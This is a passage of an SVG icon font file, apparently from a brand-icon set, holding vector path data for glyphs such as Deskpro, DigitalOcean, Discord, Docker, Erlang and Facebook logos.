c0.700195 -3.39941 1.2998 -6.7998 2.2002 -10.2002c1.59961 -5.59961 4.5 -8 10.3994 -8.39941c4.60059 -0.299805 9.30078 -0.5 13.9004 -0.900391c7.59961 -0.599609 14.2002 -3.7998 20.0996 -8.7002c19.4004 -16.1992 39 -32.1992 58.5 -48.2998
c5.7002 -4.7002 12 -8.2002 19.6006 -8.5c16.7002 -0.599609 29 15.2002 24.7998 31.7998c-0.200195 0.700195 -0.400391 1.5 -0.0996094 2.80078c2.39941 -2 4.89941 -3.80078 7 -5.90039c14.0996 -14 18.0996 -39.2998 8.69922 -56.0996
c-2.09961 -3.80078 -5.2998 -7.10059 -8.09961 -10.8008c0.700195 -0.199219 1.7998 -0.5 3 -0.599609c14 -1.40039 27.2002 1 38.9004 9.09961c15.7998 10.9004 18 31.2002 5.39941 45.6006c-4.7002 5.39941 -8.89941 8 -18.7998 12
c6.5 1.2998 19.2002 0.200195 28.7002 -2.90039zM99.4004 268.7c-5.30078 9.2002 -13.2002 15.5996 -22.1006 21.2998c13.7002 0.5 26.6006 -0.200195 39.6006 -3.7002c-7 12.2002 -8.5 24.7002 -5 38.7002c5.2998 -11.9004 13.6992 -20.0996 23.5996 -26.7998
c19.7002 -13.2002 35.7002 -19.6006 46.7002 -30.2002c3.39941 -3.2998 6.2998 -7.09961 9.59961 -10.9004c-0.799805 2.10059 -1.39941 4.10059 -2.2002 6c-5 10.6006 -13 18.6006 -22.5996 25c-1.7998 1.2002 -2.7998 2.5 -3.40039 4.5
c-3.2998 12.5 -3 25.1006 -0.699219 37.6006c1 5.5 2.7998 10.8994 4.5 16.2998c0.799805 2.40039 2.2998 4.59961 4 6.59961c0.599609 -6.89941 0 -25.5 19.5996 -46c10.7998 -11.2998 22.4004 -21.8994 33.9004 -32.6992c9 -8.5 18.2998 -16.7002 25.5 -26.8008
c1.09961 -1.59961 2.19922 -3.2998 3.7998 -4.69922c-5 13 -14.2002 24.0996 -24.2002 33.7998c-9.59961 9.2998 -19.4004 18.3994 -29.2002 27.3994c-3.2998 3 -4.59961 6.7002 -5.09961 10.9004c-1.2002 10.4004 0 20.5996 4.2998 30.2002c0.5 1 1.09961 2 1.90039 3.2998
c0.5 -4.2002 0.599609 -7.90039 1.39941 -11.5996c4.7998 -23.1006 20.4004 -36.3008 49.2998 -63.5c10 -9.40039 19.3008 -19.2002 25.6006 -31.6006c4.7998 -9.2998 7.2998 -19 5.7002 -29.5996c-0.100586 -0.600586 0.5 -1.7002 1.09961 -2
c6.2002 -2.60059 10 -6.90039 9.7002 -14.2998c7.7002 2.59961 12.5 8 16.3994 14.5c4.2002 -20.2002 -9.09961 -50.3008 -27.1992 -58.7002c0.399414 4.5 5 23.3994 -16.5 27.7002c-6.80078 1.2998 -12.8008 1.2998 -22.9004 2.09961c4.7002 9 10.4004 20.5996 0.5 22.4004
c-24.9004 4.59961 -52.7998 -1.90039 -57.7998 -4.60059c8.2002 -0.399414 16.2998 -1 23.5 -3.2998c-2 -6.5 -4 -12.7002 -5.7998 -18.9004c-1.90039 -6.5 2.09961 -14.5996 9.2998 -9.59961c1.2002 0.900391 2.2998 1.90039 3.2998 2.7002
c-3.09961 -17.9004 -2.90039 -15.9004 -2.7998 -18.2998c0.299805 -10.2002 9.5 -7.80078 15.7002 -7.30078c-2.5 -11.7998 -29.5 -27.2998 -45.4004 -25.7998c7 4.7002 12.7002 10.2998 15.9004 17.9004c-6.5 -0.799805 -12.9004 -1.60059 -19.2002 -2.40039
l-0.299805 0.900391c4.69922 3.39941 8 7.7998 10.1992 13.0996c8.7002 21.1006 -3.59961 38 -25 39.9004c-9.09961 0.799805 -17.7998 -0.799805 -25.8994 -5.5c6.2002 15.5996 17.2002 26.5996 32.5996 34.5c-15.2002 4.2998 -8.89941 2.7002 -24.5996 6.2998
c14.5996 9.2998 30.2002 13.2002 46.5 14.5996c-5.2002 3.2002 -48.1006 3.60059 -70.2002 -20.8994c7.90039 -1.40039 15.5 -2.7998 23.2002 -4.2002c-23.7998 -7 -44 -19.7002 -62.4004 -35.5996c1.10059 4.7998 2.7002 9.5 3.2998 14.2998
c0.600586 4.5 0.800781 9.2002 0.100586 13.5996c-1.5 9.40039 -8.90039 15.1006 -19.7002 16.2998c-7.90039 0.900391 -15.5996 -0.0996094 -23.2998 -1.2998c-0.900391 -0.0996094 -1.7002 -0.299805 -2.90039 0c15.7998 14.7998 36 21.7002 53.1006 33.5
c6 4.5 6.7998 8.2002 3 14.9004zM227.8 241.9c3.2998 -16 12.6006 -25.5 23.7998 -24.3008c-4.59961 11.3008 -12.0996 19.5 -23.7998 24.3008z" />
    <glyph glyph-name="deploydog" unicode="&#xf38e;" horiz-adv-x="512" 
d="M382.2 312h51.7002v-239.6h-51.7002v20.6992c-19.7998 -24.7998 -52.7998 -24.0996 -73.7998 -14.6992c-26.2002 11.6992 -44.3008 38.0996 -44.3008 71.7998c0 29.7998 14.8008 57.8994 43.3008 70.7998c20.1992 9.09961 52.6992 10.5996 74.7998 -12.9004v103.9z
M317.5 150.2c0 -18.2002 13.5996 -33.5 33.2002 -33.5c19.7998 0 33.2002 16.3994 33.2002 32.8994c0 17.1006 -13.7002 33.2002 -33.2002 33.2002c-19.6006 0 -33.2002 -16.3994 -33.2002 -32.5996zM188.5 312h51.7002v-239.6h-51.7002v20.6992
c-19.7998 -24.7998 -52.7998 -24.0996 -73.7998 -14.6992c-26.2002 11.6992 -44.2998 38.0996 -44.2998 71.7998c0 29.7998 14.7998 57.8994 43.2998 70.7998c20.2002 9.09961 52.7002 10.5996 74.7998 -12.9004v103.9zM123.8 150.2c0 -18.2002 13.6006 -33.5 33.2002 -33.5
c19.7998 0 33.2002 16.3994 33.2002 32.8994c0 17.1006 -13.7002 33.2002 -33.2002 33.2002c-19.7002 0 -33.2002 -16.3994 -33.2002 -32.5996zM448 352h-384c-17.5996 0 -32 -14.5 -32 -32v-256c0 -17.5996 14.5 -32 32 -32h384c17.5996 0 32 14.5 32 32v256
c0 17.5996 -14.5 32 -32 32zM448 384c35.2002 0 64 -28.7998 64 -64v-256c0 -35.2002 -28.7998 -64 -64 -64h-384c-35.2002 0 -64 28.7998 -64 64v256c0 35.2002 28.7998 64 64 64h384z" />
    <glyph glyph-name="deskpro" unicode="&#xf38f;" horiz-adv-x="480" 
d="M205.9 -64l31.0996 38.4004c12.2998 0.199219 25.5996 1.39941 36.5 6.59961c38.9004 18.5996 38.4004 61.9004 38.2998 63.7998c-0.0996094 5 -0.799805 4.40039 -28.8994 37.4004h79.0996c-0.200195 -50.1006 -7.2998 -68.5 -10.2002 -75.7002
c-9.39941 -23.7002 -43.8994 -62.7998 -95.2002 -69.4004c-8.69922 -1.09961 -32.7998 -1.19922 -50.6992 -1.09961zM406.3 103.7l-119.2 -0.100586l17.4004 31.3008l175.5 -0.300781c-15.2002 -17.2998 -35.0996 -30.8994 -73.7002 -30.8994zM362.7 327.6v-168.3h-73.5
l-32.7002 -55.5h-6.5c-52.2998 0 -58.0996 56.5 -58.2998 58.9004c-1.2002 13.2002 -21.2998 11.5996 -20.1006 -1.7998c1.40039 -15.8008 8.80078 -40 26.4004 -57.1006h-91c-25.5 0 -110.8 26.7998 -107 114v213.3c0 16 9.7002 16.6006 15 16.8008h82
c0.200195 0 0.299805 -0.100586 0.5 -0.100586c4.2998 0.400391 50.0996 2.10059 50.0996 -43.7002c0 -13.2998 20.2002 -13.3994 20.2002 0c0 18.2002 -5.5 32.8008 -15.7998 43.7002h84.2002c108.7 0.400391 126.5 -79.3994 126.5 -120.2zM230.2 271.6l64 -29.2998
c13.2998 45.5 -42.2002 71.7002 -64 29.2998z" />
    <glyph glyph-name="digital-ocean" unicode="&#xf391;" horiz-adv-x="511" 
d="M87 -33.7998v73.5996h73.7002v-73.5996h-73.7002zM25.4004 101.4h61.5996v-61.6006h-61.5996v61.6006zM491.6 271.1c53.2002 -170.3 -73 -327.1 -235.6 -327.1v95.7998h0.299805v0.299805c101.7 0.200195 180.5 101 141.4 208
c-14.2998 39.6006 -46.1006 71.4004 -85.7998 85.7002c-107.101 38.7998 -208.101 -39.8994 -208.101 -141.7h-95.7998c0 162.2 156.9 288.7 327 235.601c74.2002 -23.2998 133.6 -82.4004 156.6 -156.601zM256.3 40.0996h-0.299805v-0.299805h-95.2998v95.6006h95.5996
v-95.3008z" />
    <glyph glyph-name="discord" unicode="&#xf392;" 
d="M297.216 204.8c0 -15.6162 -11.5195 -28.416 -26.1123 -28.416c-14.3359 0 -26.1113 12.7998 -26.1113 28.416s11.5195 28.416 26.1113 28.416c14.5928 0 26.1123 -12.7998 26.1123 -28.416zM177.664 233.216c14.5918 0 26.3682 -12.7998 26.1123 -28.416
c0 -15.6162 -11.5205 -28.416 -26.1123 -28.416c-14.3359 0 -26.1123 12.7998 -26.1123 28.416s11.5205 28.416 26.1123 28.416zM448 395.264v-459.264c-64.4941 56.9941 -43.8682 38.1279 -118.784 107.776l13.5684 -47.3604h-290.304
c-28.9287 0 -52.4805 23.5518 -52.4805 52.7363v346.111c0 29.1846 23.5518 52.7363 52.4805 52.7363h343.039c28.9287 0 52.4805 -23.5518 52.4805 -52.7363zM375.04 152.576c0 82.4316 -36.8643 149.248 -36.8643 149.248
c-36.8643 27.6475 -71.9355 26.8799 -71.9355 26.8799l-3.58398 -4.0957c43.5195 -13.3125 63.7441 -32.5127 63.7441 -32.5127c-60.8115 33.3291 -132.244 33.335 -191.232 7.42383c-9.47168 -4.35156 -15.1035 -7.42383 -15.1035 -7.42383
s21.2471 20.2246 67.3271 33.5361l-2.55957 3.07227s-35.0723 0.767578 -71.9355 -26.8799c0 0 -36.8643 -66.8164 -36.8643 -149.248c0 0 21.5039 -37.1201 78.0801 -38.9121c0 0 9.47168 11.5195 17.1514 21.248c-32.5117 9.72754 -44.7998 30.208 -44.7998 30.208
c3.7666 -2.63574 9.97656 -6.05273 10.4961 -6.40039c43.21 -24.1973 104.588 -32.126 159.744 -8.95996c8.95996 3.32812 18.9443 8.19238 29.4395 15.1045c0 0 -12.7998 -20.9922 -46.3359 -30.4639c7.68066 -9.72852 16.8965 -20.7363 16.8965 -20.7363
c56.5762 1.79199 78.3359 38.9121 78.3359 38.9121z" />
    <glyph glyph-name="discourse" unicode="&#xf393;" 
d="M225.9 416c122.699 0 222.1 -102.3 222.1 -223.9c0 -121.6 -99.4004 -223.899 -222.1 -223.899l-225.801 -0.200195s-0.0996094 224 -0.0996094 227.9c0 121.6 103.3 220.1 225.9 220.1zM224 64c70.7002 0 128 57.2998 128 128s-57.2998 128 -128 128
s-128 -57.2998 -128 -128c0 -22.0996 5.59961 -42.9004 15.4004 -61l-22.9004 -75l81.0996 20.0996c16.5 -7.7998 35 -12.0996 54.4004 -12.0996z" />
    <glyph glyph-name="dochub" unicode="&#xf394;" horiz-adv-x="400" 
d="M397.9 288h-141.9v140.4zM304 256h96v-126.1c0 -129.301 -70.2998 -193.9 -210.8 -193.9h-189.2v512h189.2c12.2002 0 23.7002 -1.09961 34.5996 -3.2998v-84c-10 1.7002 -21.0996 2.5 -33.0996 2.5h-94.7002v-337.3h94.7002c76.7998 0 113.3 33.2998 113.3 100.1v130z
" />
    <glyph glyph-name="docker" unicode="&#xf395;" horiz-adv-x="640" 
d="M349.9 211.7h-66.1006v59.3994h66.1006v-59.3994zM349.9 416v-60.7002h-66.1006v60.7002h66.1006zM428.1 271.2v-59.4004h-66.0996v59.4004h66.0996zM271.8 343.3v-60.0996h-66.0996v60.0996h66.0996zM349.9 343.3v-60.0996h-66.1006v60.0996h66.1006zM626.7 243.3
l13.2998 -8.89941c-1.90039 -3.90039 -7 -14.6006 -8.5 -17.1006c-23.7002 -45.2998 -69.9004 -45.5996 -91.2998 -45.2002c-54.5 -131.699 -171 -204.199 -328.4 -204.199c-72.7002 0 -128.3 22.2998 -165.399 66.1992c-38.2002 45.3008 -52.7002 111.301 -44 162.101
h434.699c22.6006 -0.400391 39.7002 6 48.4004 10.7002c-19.7002 30.1992 -14.7002 76 3.7002 103.8l9.2998 14l14 -9.2998c24.4004 -18.8008 37.7998 -39.7002 41.0996 -63.7002c25.5 4.7998 58.7002 1.2998 73.1006 -8.40039zM115.6 271.2h0.100586v-59.4004h-66.1006
v59.4004h66zM193.7 271.2v-59.4004h-66.1006v59.4004h66.1006zM271.8 271.2v-59.4004h-66.0996v59.4004h66.0996zM193.7 343.3v-60.0996h-66.1006v60.0996h66.1006z" />
    <glyph glyph-name="draft2digital" unicode="&#xf396;" horiz-adv-x="480" 
d="M480 49.9004l-144 -81.9004v64.2002l-336 -0.100586c18.2998 19.1006 84.5 87.8008 161.1 174.801c32.6006 37.1992 78 83.2998 69.7002 127.6c-5.2998 28.2998 -42.2002 50.7998 -83.2998 33.5c-8.59961 -3.59961 -24.5 -17.4004 -26.2998 -24.7002
c28.2998 -4.7002 48 -29.7002 48 -56.7998c0 -31.7002 -25.6006 -57.4004 -57.2998 -57.4004c-37.3008 0 -62.2002 34.1006 -56.7002 67.1006c1.2002 7.89941 5.09961 26.7998 18.2002 47.7002c14.8994 23.8994 45.1992 54.8994 104.3 67.2998
c103.8 21.7002 161.6 -36.6006 166 -41.2002c28.8994 -29.9004 48 -90.7002 12.7998 -153.3c-30 -53.4004 -81 -114.3 -111.8 -149.3h91.2998v64.6992zM369.9 77v-54.4004l47.0996 27.2002zM134.2 286.6c0 12.3008 -10 22.4004 -22.4004 22.4004
c-12.3994 0 -22.3994 -10 -22.3994 -22.4004c0 -12.3994 10 -22.3994 22.3994 -22.3994c12.4004 0 22.4004 10 22.4004 22.3994zM82.5 67.5h114.4c17.5996 19.2002 91.5 100.8 128.5 166.7c36.5996 65.0996 -5.80078 113.3 -5.80078 113.3
c-14.1992 14.9004 -36.8994 36.2002 -82.1992 38.2998c6.7998 -5.5 16.8994 -16.8994 24.2998 -35.7002c11.8994 -30.2998 6.7002 -69.5996 -28.4004 -112.699c-53.0996 -65.2002 -125.2 -142.5 -150.8 -169.9z" />
    <glyph glyph-name="dribbble-square" unicode="&#xf397;" 
d="M90.2002 219.8c8.89941 42.4004 37.3994 77.7002 75.7002 95.7002c3.59961 -4.90039 28 -38.7998 50.6992 -79c-64 -17 -120.3 -16.7998 -126.399 -16.7002zM314.6 294c-2.5 -3.5 -23 -31.0996 -71.5996 -49.4004c-22.4004 41.1006 -47.2002 74.9004 -51 80
c43.2998 10.5 89 -0.799805 122.6 -30.5996zM140.1 84c14.3008 29.2002 53 66.7998 108.101 85.5996c19.2002 -49.7998 27.2002 -91.5996 29.2002 -103.6c-44 -18.7002 -96.8008 -13.5996 -137.301 18zM238.9 192.2c-49.4004 -13.9004 -94.3008 -53.9004 -116.5 -91.7998
c-21.8008 24.2998 -35.1006 56.2998 -35.1006 91.3994c0 1.40039 0.100586 2.7998 0.100586 4.2002c6 -0.200195 72.1992 -1 140.399 19.4004c3.90039 -7.7002 7.7002 -15.4004 11.1006 -23.2002zM273.8 175.9c42.7998 6.89941 80.5 -4.30078 85.1006 -5.80078
c-6.10059 -38 -27.9004 -70.8994 -58.6006 -91.5996c-1.39941 8.2998 -8.59961 48.2998 -26.5 97.4004zM253.5 224.3c50.5 20.7002 73.4004 50 76.2998 53.9004c19.1006 -23.2002 30.6006 -52.7998 30.9004 -85.1006c-4.5 1 -49.7002 10.1006 -95.2002 4.40039
c-3.7002 9 -7.2002 17 -12 26.7998zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM384 192c0 88.2002 -71.7998 160 -160 160s-160 -71.7998 -160 -160s71.7998 -160 160 -160
s160 71.7998 160 160z" />
    <glyph glyph-name="dyalog" unicode="&#xf399;" horiz-adv-x="416" 
d="M0 416h171.2c74.5 0 137.7 -24 182.5 -69.5996c40.2002 -40.9004 62.2998 -95.6006 62.2998 -154.301c0 -111.399 -84.0996 -224.1 -244.8 -224.1h-171.2v64h171.2c122.2 0 180.8 84 180.8 160.1c0 79.7002 -67.4004 159.9 -180.8 159.9h-107.2v-55.2002h-64v119.2z" />
    <glyph glyph-name="earlybirds" unicode="&#xf39a;" horiz-adv-x="480" 
d="M313.2 400.5c1.2002 13 21.2998 14 36.5996 8.7002c0.900391 -0.299805 26.2002 -9.7002 19 -15.2002c-27.8994 7.40039 -56.3994 -18.2002 -55.5996 6.5zM112.2 393.6c-7.7998 6.2002 19.8994 16.4004 20.8994 16.7002c16.8008 5.7002 38.9004 4.60059 40.2002 -9.59961
c0.900391 -27.1006 -30.3994 1 -61.0996 -7.10059zM319.4 288c8.7998 0 16 -7.2002 16 -16s-7.2002 -16 -16 -16c-8.80078 0 -16 7.2002 -16 16s7.19922 16 16 16zM159.7 288c8.7998 0 16 -7.2002 16 -16s-7.2002 -16 -16 -16s-16 7.2002 -16 16s7.2002 16 16 16z
M478.2 124.8c-9.90039 -24 -40.7002 -11 -63.9004 1.2002c-13.5 -69.0996 -58.0996 -111.4 -126.3 -124.2c0.299805 -0.899414 -2 0.100586 24 -1c33.5996 -1.39941 63.7998 3.10059 97.4004 8c-19.8008 13.7998 -11.4004 37.1006 -9.80078 38.1006
c1.40039 0.899414 14.7002 -1.7002 21.6006 -11.5c8.59961 12.5 28.3994 14.7998 30.2002 13.5996c1.59961 -1.09961 6.59961 -20.9004 -6.90039 -34.5996c4.7002 0.899414 8.2002 1.59961 9.7998 2.09961c2.60059 0.799805 17.7002 -11.2998 3.10059 -13.2998
c-14.3008 -2.2998 -22.6006 -5.10059 -47.1006 -10.7998c-45.8994 -10.7002 -85.8994 -11.8008 -117.7 -12.8008l1 -11.5996c3.80078 -18.0996 -23.3994 -24.2998 -27.5996 -6.2002c0.799805 -17.8994 -27.0996 -21.7998 -28.4004 1l-0.5 -5.2998
c-0.699219 -18.4004 -28.3994 -17.9004 -28.2998 0.599609c-7.5 -13.5 -28.0996 -6.7998 -26.3994 8.5l1.19922 12.4004c-36.6992 -0.900391 -59.6992 -3.09961 -61.7998 -3.09961c-20.8994 0 -20.8994 31.5996 0 31.5996c2.40039 0 27.7002 -1.2998 63.2002 -2.7998
c-61.0996 15.5 -103.7 55 -114.9 118.2c-25 -12.8008 -57.5 -26.8008 -68.1992 -0.800781c-10.5 25.4004 21.5 42.6006 66.7998 73.4004c0.700195 6.59961 1.59961 13.2998 2.7002 19.7998c-14.4004 19.6006 -11.6006 36.2998 -16.1006 60.4004
c-16.7998 -2.40039 -23.2002 9.09961 -23.5996 23.0996c0.299805 7.2998 2.09961 14.9004 2.39941 15.4004c1.10059 1.7998 10.1006 2 12.7002 2.59961c6 31.7002 50.6006 33.2002 90.9004 34.5c19.7002 21.7998 45.2002 41.5 80.8994 48.2998
c-15.2998 19.4004 -3.39941 39.9004 -2.39941 40.4004c1.7002 0.799805 21.2002 -4.2998 26.2998 -23.2002c5.2002 8.7998 18.2998 11.4004 19.5996 10.7002c1.10059 -0.599609 6.40039 -15 -4.89941 -25.9004c40.2998 -3.5 72.2002 -24.6992 96 -50.6992
c36.0996 -1.5 71.7998 -5.90039 77.0996 -34c2.7002 -0.600586 11.6006 -0.800781 12.7002 -2.60059c0.299805 -0.5 2.09961 -8.09961 2.40039 -15.3994c-0.5 -13.9004 -6.80078 -25.4004 -23.6006 -23.1006c-3.2002 -17.2998 -2.7002 -32.8994 -8.7002 -47.7002
c2.40039 -11.6992 4 -23.7998 4.80078 -36.3994c37 -25.4004 70.2998 -42.5 60.2998 -66.9004zM207.4 288.1c0.899414 44 -37.9004 42.2002 -78.6006 40.3008c-21.7002 -1 -38.8994 -1.90039 -45.5 -13.9004c-11.3994 -20.9004 5.90039 -92.9004 23.2002 -101.2
c9.7998 -4.7002 73.4004 -7.89941 86.2998 7.10059c8.2002 9.39941 15 49.3994 14.6006 67.6992zM259.4 229.8c-4.30078 12.4004 -6 30.1006 -15.3008 32.7002c-2 0.5 -9 0.5 -11 0c-10 -2.7998 -10.7998 -22.0996 -17 -37.2002c15.4004 0 19.3008 -9.7002 23.7002 -9.7002
c4.2998 0 6.2998 11.3008 19.6006 14.2002zM395.1 314.5c-6.59961 12.0996 -24.7998 12.9004 -46.5 13.9004c-40.1992 1.89941 -78.1992 3.7998 -77.2998 -40.3008c-0.5 -18.2998 5 -58.2998 13.2002 -67.7998c13 -14.8994 76.5996 -11.7998 86.2998 -7.09961
c15.7998 7.59961 36.5 78.8994 24.2998 101.3z" />
    <glyph glyph-name="erlang" unicode="&#xf39d;" horiz-adv-x="640" 
d="M87.2002 394.5c-41.5 -50.2002 -65.6006 -116.2 -65.5 -192.9c-0.100586 -86.7998 29 -159.5 78.7002 -212.1h-100.4v405h87.2002zM325.4 384.8c46.1992 -0.0996094 79.5996 -33.5 80.6992 -83.2002h-169.899c4.09961 49.7002 43.2998 83.1006 89.2002 83.2002z
M556.1 394.4h0.300781l-0.100586 0.0996094zM556.4 394.4h83.5996v-405h-80.7998c21.3994 23 40.5 49.8994 57.8994 80.7998l-96.3994 48.2002c-33.9004 -55.1006 -83.4004 -105.801 -151.9 -106.101c-99.7002 0.400391 -138.8 85.6006 -138.6 195.3h372.399
c0.5 12.4004 0.5 18.1006 0 24.1006c2.5 65.2002 -14.7998 120 -46.1992 162.7z" />
    <glyph glyph-name="facebook-f" unicode="&#xf39e;" horiz-adv-x="264" 
d="M215.8 363c-37.7998 0 -45.0996 -18 -45.0996 -44.2998v-62.7002h85.2998l-11.7002 -91h-73.5996v-229h-94v229h-76.7002v91h76.7002v71.7002c0 77.8994 47.5996 120.3 117.1 120.3c33.2998 0 61.9004 -2.5 70.2002 -3.59961v-81.4004h-48.2002z" />
    <glyph glyph-name="facebook-messenger" unicode="&#xf39f;" horiz-adv-x="447" 
d="M224 416c122.5 0 221.8 -92.7998 221.7 -207.3c0 -138.8 -143.2 -238.5 -285.4 -198.7l-75.7002 -42v79.4004c-162.1 122.6 -68.6992 368.6 139.4 368.6zM247.4 137.9l121.1 128.5l-110.4 -61.1006l-57.3994 59.6006l-121.101 -128.5l110.4 61.0996z" />
    <glyph glyph-name="firstdraft" unicode="&#xf3a1;" horiz-adv-x="384" 
d="M384 256h-64v-128h-128v-128h-192v25.5996h166.4v128h128v128h89.5996v-25.5996zM358.4 217.6h25.5996v-153.6h-128v-128h-192v25.5996h166.4v128h128v128zM384 25.5996v-25.5996h-64v-64h-25.5996v89.5996h89.5996zM0 448h384v-128h-128v-128h-128v-128h-128v384z" />
    <glyph glyph-name="fonticons-fi" unicode="&#xf3a2;" horiz-adv-x="384" 
d="M114.4 224h92.3994l-15.2002 -51.2002h-76.3994v-157.8c0 -8 -2.7998 -9.2002 4.39941 -10l59.6006 -5.59961v-34.4004h-179.2v35.2002l29.2002 2.7998c7.2002 0.799805 9.2002 3.2002 9.2002 10.7998v155.8c0 3.2002 -4 3.2002 -8 3.2002h-30.4004v51.2002h38.4004
v28.7998c0 68 36.3994 96 106 96c46.7998 0 88.7998 -11.2002 88.7998 -72.3994l-69.6006 -8.40039c0.400391 25.5996 -6 31.5996 -22.3994 31.5996c-25.2002 0 -26 -13.5996 -26 -37.5996v-32c0 -3.2002 -4.7998 -6 -0.799805 -6zM384 -35h-140.8v34.4004l28 3.59961
c7.2002 0.799805 10.3994 2.40039 10.3994 10v148c0 5.59961 -4 9.2002 -9.19922 10.7998l-33.2002 8.7998l9.2002 40.4004h110v-208c0 -8 -3.60059 -8.7998 4 -10l21.5996 -3.59961v-34.4004zM354 312.2l12.4004 -45.6006l-10 -10l-42.8008 22.8008l-42.7998 -22.8008
l-10 10l12.4004 45.6006l-30 36.3994l4.7998 10h38l21.2002 38.4004h12.7998l21.2002 -38.4004h38l4.7998 -13.1992z" />
    <glyph glyph-name="fort-awesome-alt" unicode="&#xf3a3;" horiz-adv-x="512" 
d="M208 210.6c2.09961 0 3.7002 -1.59961 3.7002 -3.69922v-51.7002c0 -2.10059 -1.60059 -3.7002 -3.7002 -3.7002h-22.2002c-2.09961 0 -3.7002 1.59961 -3.7002 3.7002v51.7002c0 2.09961 1.60059 3.69922 3.7002 3.69922h22.2002zM326.2 210.6
c2 0 3.59961 -1.59961 3.7002 -3.69922v-51.7002c0 -2.10059 -1.60059 -3.7002 -3.7002 -3.7002h-22.2002c-2.09961 0 -3.7002 1.59961 -3.7002 3.7002v51.7002c0 2.09961 1.60059 3.69922 3.7002 3.69922h22.2002zM458.2 335.7
c28.8994 -40.7002 45.7998 -90.2002 45.7998 -143.7c0 -2 0 -4 -0.0996094 -6c0 -0.700195 0 -1.2998 -0.100586 -2c0 -1.2998 -0.0996094 -2.7002 -0.200195 -4c0 -0.799805 -0.0996094 -1.5 -0.0996094 -2.2998
c-0.0996094 -1.2002 -0.0996094 -2.40039 -0.200195 -0.700195c-0.0996094 -0.799805 -0.0996094 -1.59961 -0.200195 -2.40039c-0.0996094 -1.19922 -0.199219 -2.39941 -0.299805 -3.5c-0.0996094 -0.799805 -0.200195 -1.59961 -0.200195 -2.39941
c-0.0996094 -1.2002 -0.299805 -2.40039 -0.399414 -3.60059c-0.100586 -0.799805 -0.200195 -1.5 -0.299805 -2.2998c-0.200195 -1.2998 -0.400391 -2.59961 -0.5 -3.89941c-0.100586 -0.600586 -0.200195 -1.30078 -0.300781 -1.90039l-0.899414 -5.7002
c-0.100586 -0.599609 -0.200195 -1.09961 -0.299805 -1.7002c-0.200195 -1.2998 -0.5 -2.69922 -0.800781 -4c-0.199219 -0.799805 -0.299805 -1.59961 -0.5 -2.39941c-0.199219 -1.10059 -0.5 -2.2002 -0.699219 -3.2002
c-0.200195 -0.900391 -0.400391 -1.7002 -0.600586 -2.59961c-0.200195 -1 -0.5 -2 -0.700195 -3c-0.199219 -0.900391 -0.5 -1.80078 -0.699219 -2.7002c-0.300781 -1 -0.5 -1.90039 -0.800781 -2.90039c-0.199219 -0.899414 -0.5 -1.7998 -0.799805 -2.7002
c-0.299805 -0.899414 -0.599609 -1.89941 -0.799805 -2.7998c-0.299805 -0.899414 -0.5 -1.7998 -0.799805 -2.7002c-0.299805 -0.899414 -0.600586 -1.7998 -0.900391 -2.7998c-0.5 -1.59961 -1.09961 -3.2998 -1.7002 -4.89941
c-0.299805 -0.900391 -0.599609 -1.80078 -1 -2.80078c-0.399414 -1 -0.699219 -2 -1.09961 -3c-0.299805 -0.799805 -0.599609 -1.5 -0.900391 -2.2998l-1.19922 -3c-0.300781 -0.700195 -0.600586 -1.5 -0.900391 -2.2002c-0.400391 -1 -0.799805 -2 -1.2998 -3
l-0.900391 -2.09961c-0.399414 -1 -0.899414 -2 -1.39941 -3c-0.300781 -0.700195 -0.600586 -1.2998 -0.900391 -2c-0.5 -1 -1 -2.09961 -1.5 -3.09961c-0.299805 -0.600586 -0.599609 -1.10059 -0.799805 -1.7002c-0.600586 -1.10059 -1.10059 -2.2002 -1.7002 -3.2998
c-0.0996094 -0.200195 -0.200195 -0.300781 -0.299805 -0.5c-2.2002 -4.10059 -4.40039 -8.2002 -6.7998 -12.2002c-0.200195 -0.400391 -0.5 -0.799805 -0.700195 -1.2002c-0.700195 -1.09961 -1.2998 -2.2002 -2 -3.2998
c-0.299805 -0.5 -0.600586 -0.900391 -0.900391 -1.40039c-0.700195 -1.09961 -1.39941 -2.09961 -2 -3.2002c-0.299805 -0.5 -0.599609 -0.899414 -0.899414 -1.39941c-0.700195 -1.10059 -1.40039 -2.10059 -2.10059 -3.2002
c-0.299805 -0.400391 -0.599609 -0.799805 -0.799805 -1.2002c-0.799805 -1.09961 -1.5 -2.2002 -2.2998 -3.2998c-0.200195 -0.200195 -0.299805 -0.5 -0.5 -0.700195c-37.6006 -54.7002 -94.5 -91.3994 -160.101 -102.399
c-0.899414 -0.100586 -1.69922 -0.300781 -2.59961 -0.400391c-1 -0.200195 -2.09961 -0.299805 -3.09961 -0.5c-0.900391 -0.0996094 -1.80078 -0.299805 -2.80078 -0.400391c-1 -0.0996094 -2 -0.299805 -3 -0.399414c-1 -0.100586 -2 -0.200195 -2.89941 -0.299805
c-1 -0.100586 -1.90039 -0.200195 -2.90039 -0.300781c-1 -0.0996094 -2.09961 -0.199219 -3.09961 -0.299805c-0.900391 -0.0996094 -1.7998 -0.200195 -2.7002 -0.200195c-1.09961 -0.0996094 -2.2998 -0.0996094 -3.40039 -0.199219
c-0.799805 0 -1.69922 -0.100586 -2.5 -0.100586c-1.2998 -0.0996094 -2.59961 -0.0996094 -3.89941 -0.0996094c-0.700195 0 -1.40039 -0.100586 -2.10059 -0.100586c-2 0 -4 -0.0996094 -6 -0.0996094s-4 0 -6 0.0996094c-0.699219 0 -1.39941 0 -2.09961 0.100586
c-1.2998 0 -2.59961 0.0996094 -3.90039 0.0996094c-0.799805 0 -1.69922 0.100586 -2.5 0.100586c-1.09961 0.0996094 -2.2998 0.0996094 -3.39941 0.199219c-0.900391 0.100586 -1.7998 0.100586 -2.7002 0.200195c-1 0.100586 -2.09961 0.200195 -3.09961 0.299805
c-1 0.100586 -1.90039 0.200195 -2.90039 0.300781c-1 0.0996094 -2 0.199219 -2.90039 0.299805c-1 0.0996094 -2 0.200195 -3 0.399414c-0.899414 0.100586 -1.7998 0.300781 -2.7998 0.400391s-2.09961 0.299805 -3.09961 0.5
c-0.900391 0.0996094 -1.7002 0.299805 -2.60059 0.400391c-65.5996 10.8994 -122.5 47.6992 -160 99.3994c-0.199219 0.200195 -0.299805 0.5 -0.5 0.700195c-0.799805 1.09961 -1.59961 2.2002 -2.2998 3.2998c-0.299805 0.400391 -0.599609 0.799805 -0.799805 1.2002
